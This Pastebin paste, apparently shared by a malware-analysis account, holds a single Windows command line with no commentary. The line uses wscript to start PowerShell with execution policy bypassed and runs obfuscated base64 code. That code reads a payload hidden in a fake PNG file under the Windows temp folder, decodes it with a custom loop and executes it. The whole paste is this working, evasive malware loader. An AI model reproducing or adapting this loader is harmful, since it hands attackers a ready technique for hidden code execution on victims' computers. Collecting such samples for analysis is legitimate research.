Advertisement
dissectmalware

Variable N

Mar 3rd, 2019
415
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 1.04 KB | None | 0 0
  1. c:\windows\system32\wscript.exe c:\windows\temp\temp.vbs "powershell -exec bypass -c ""iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPWlleCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBcaWQucG5nJycpKSknKSk7JEJCPWlleCgoJ3N0YXJ0LXNsZWVwIDEwOyRzPSRYWDskZCA9IEAoKTskdiA9IDA7JGMgPSAwO3doaWxlKCRjIC1uZSAkcy5sZW5ndGgpeyR2PSgkdio1MikrKFtJbnQzMl1bY2hhcl0kc1skY10tJyArIFtjaGFyXTB4MzQgKyAnMCk7aWYoKCgkYysxKSUzKSAtZXEgMCl7d2hpbGUoJHYgLW5lIDApeyR2dj0kdiUyNTY7aWYoJHZ2IC1ndCAwKXskZCs9W2NoYXJdW0ludDMyXSR2dn0kdj1bSW50MzJdKCR2LzI1Nil9fSRjKz0xO307W2FycmF5XTo6UmV2ZXJzZSgkZCk7aWV4KFsnICsgW2NoYXJdMHg1MyArICd0cmluZ106OkonICsgW2NoYXJdMHg2ZiArICdpbignJycnLCRkKSk7OycpKTtpZXgoJEJCKQ==')))"""
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement